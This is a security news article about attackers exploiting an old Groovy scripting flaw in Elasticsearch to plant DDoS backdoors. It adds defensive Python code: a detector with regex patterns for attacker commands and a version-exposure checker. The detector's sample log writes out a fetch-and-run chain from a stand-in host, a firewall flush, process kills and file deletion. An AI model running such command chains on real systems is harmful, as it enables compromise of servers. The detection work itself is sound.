
Criminals turn Elasticsearch clusters into DDoS botnets

Hackers are attacking Internet-exposed Elasticsearch clusters with the goal of turning them into DDoS botnets.

In multi-stage attacks, the attackers used scripts to plant a backdoor that could steal information and carry out DDoS attacks.

“The latest attack we spotted deviates from the usual profit-driven motive by delivering backdoors as its payload. These threats can turn affected targets into botnet zombies used in distributed-denial-of-service (DDoS) attacks,” Trend Micro's report says.

Having found vulnerable servers, the attackers downloaded a first-stage malicious script, which disables the firewall and any crypto miners it detects on the target server. Next, a second-stage script with similar functionality was uploaded to the server. It could also disable the firewall and delete certain files, including various configuration files and competing malware, if they were present on the system.


It then killed crypto-mining and other unwanted processes on the system and loaded the backdoor. Both scripts were downloaded from compromised websites in order to avoid detection.
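The staged behaviour described above (fetching a script from a remote site, disabling the firewall, killing rival processes, deleting files, executing from a temporary directory) is easier to spot as a combination than as any single command. The following is an added example written for this article, not code from Trend Micro or from the malware: it scores constructed audit-style command records per host and flags hosts that show several of these indicator categories together. The host names, command lines and thresholds are all constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of (host, command line) records, in the style of a
# shell-audit or process-creation log. These are not real logs.
SAMPLE_EVENTS = [
    ("es-node-1", "curl -fsSL http://compromised.example/update.sh -o /tmp/u.sh"),
    ("es-node-1", "sh /tmp/u.sh"),
    ("es-node-1", "iptables -F"),
    ("es-node-1", "pkill -f xmrig"),
    ("es-node-1", "rm -f /etc/cron.d/miner"),
    ("es-node-1", "chmod +x /tmp/.x/bg && /tmp/.x/bg"),
    ("es-node-2", "iptables -L -n"),        # benign: listing rules, not flushing
    ("es-node-2", "pkill -f logstash"),     # a single indicator on its own
]

# Indicator categories matching the behaviour described in the article.
INDICATORS = {
    "remote_script_fetch": re.compile(r"\b(curl|wget)\b.*\bhttps?://"),
    "firewall_disabled": re.compile(
        r"\b(iptables\s+-F|ufw\s+disable|"
        r"systemctl\s+(stop|disable)\s+(firewalld|iptables)|"
        r"service\s+iptables\s+stop)\b"
    ),
    "process_kill": re.compile(r"\b(pkill|killall|kill\s+-9)\b"),
    "file_deletion": re.compile(r"\brm\s+-r?f\b"),
    "tmp_exec": re.compile(r"(^|[\s&;])(/tmp|/var/tmp|/dev/shm)/\S+"),
}


def score_hosts(events):
    """Return {host: set of indicator categories seen} over the event list."""
    seen = defaultdict(set)
    for host, cmd in events:
        for name, pattern in INDICATORS.items():
            if pattern.search(cmd):
                seen[host].add(name)
    return dict(seen)


def flag_hosts(events, min_categories=3):
    """Hosts showing at least min_categories distinct indicators, sorted by name.

    The threshold is an assumption: one category alone (an admin running
    pkill) is normal, several together match the staged-script profile.
    """
    scores = score_hosts(events)
    return sorted(h for h, cats in scores.items() if len(cats) >= min_categories)


if __name__ == "__main__":
    for host, cats in score_hosts(SAMPLE_EVENTS).items():
        print(host, sorted(cats))
    print("flagged:", flag_hosts(SAMPLE_EVENTS))
```

Run against real data, feed `score_hosts` the (host, command) pairs from your own process-creation or shell-audit source; the categories, not the exact strings, are what carry over.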

“The samples bear the hallmarks of the BillGates malware, first encountered in 2014 and known for being used to compromise systems and initiate DDoS attacks. Of late, we’ve seen variants of the BillGates malware involved in botnet-related activities,” Trend Micro specialists reported.

Previously, this malware appeared in attacks that exploit the remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638).

As part of the attacks, the hackers exploited a vulnerability (CVE-2015-1427) in the Groovy scripting engine included in Elasticsearch (versions 1.3.0 – 1.3.7 and 1.4.0 – 1.4.2).
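A defender's first question is whether any cluster still runs one of the listed versions with dynamic scripting reachable. The following is an added example, not code from the article, Trend Micro or the Elasticsearch project: it parses the version number from a constructed sample of an Elasticsearch 1.x root (`GET /`) response, checks it against the version ranges given above, and looks at two elasticsearch.yml settings. The setting names `script.disable_dynamic` and `script.groovy.sandbox.enabled` are taken from memory of the 1.x documentation and are assumptions to verify against your own version's docs; the sample response and node name are constructed.

```python
import json

# Version ranges affected by CVE-2015-1427, as listed in the article.
VULNERABLE_RANGES = [((1, 3, 0), (1, 3, 7)), ((1, 4, 0), (1, 4, 2))]


def parse_version(text):
    """Turn '1.4.2' or '1.4.2-SNAPSHOT' into a comparable (major, minor, patch) tuple."""
    core = text.split("-")[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_groovy_vulnerable(version):
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in VULNERABLE_RANGES)


def dynamic_scripting_off(settings):
    """True if the node settings leave no route for dynamic Groovy scripts.

    Assumed 1.x keys (verify against your docs): script.disable_dynamic
    (true/false/sandbox, default 'sandbox') and script.groovy.sandbox.enabled
    (the sandbox whose bypass is CVE-2015-1427; the fixed releases turned it off).
    """
    if str(settings.get("script.disable_dynamic", "sandbox")).lower() == "true":
        return True
    if str(settings.get("script.groovy.sandbox.enabled", "true")).lower() == "false":
        return True
    return False


def assess_node(root_json, settings):
    """Combine version and settings into a single risk label for one node."""
    info = json.loads(root_json)
    version = info["version"]["number"]
    vulnerable = is_groovy_vulnerable(version)
    mitigated = dynamic_scripting_off(settings)
    if not vulnerable:
        risk = "patched-or-unaffected"
    elif mitigated:
        risk = "vulnerable-version-scripting-disabled"
    else:
        risk = "exposed"
    return {
        "version": version,
        "vulnerable_version": vulnerable,
        "scripting_disabled": mitigated,
        "risk": risk,
    }


# Constructed sample of a 1.x root ("GET /") response; the build hash is a placeholder.
SAMPLE_ROOT = json.dumps({
    "status": 200,
    "name": "node-1",
    "version": {"number": "1.4.2", "build_hash": "PLACEHOLDER",
                "build_snapshot": False, "lucene_version": "4.10.2"},
    "tagline": "You Know, for Search",
})

if __name__ == "__main__":
    print(assess_node(SAMPLE_ROOT, {}))
    print(assess_node(SAMPLE_ROOT, {"script.disable_dynamic": True}))
```

A node reported as "exposed" here is one the article's attackers would have been able to use; upgrading past 1.3.7 / 1.4.2 is the real fix, and the settings check only tells you whether an interim workaround is in place.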

According to the report, attacks on Elasticsearch servers are usually relatively simple and profit-oriented: the attackers look for unprotected or misconfigured servers, or use old vulnerabilities, to plant malware, mainly crypto miners and ransomware.

William Reddy

I am from Ireland. My parents bought me a computer when I was 11, and several months later I got a virus on this PC. I decided to enter the INSA Centre Val de Loire university after graduating from school. This French educational institution was offering a brand-new cybersecurity course. After getting a master's degree in cybersecurity, I started working as a virus analyst at a small anti-malware vendor. In 2018, I decided to start the Virus Removal project. The main goal of this site is to help people deal with PC viruses of any kind.
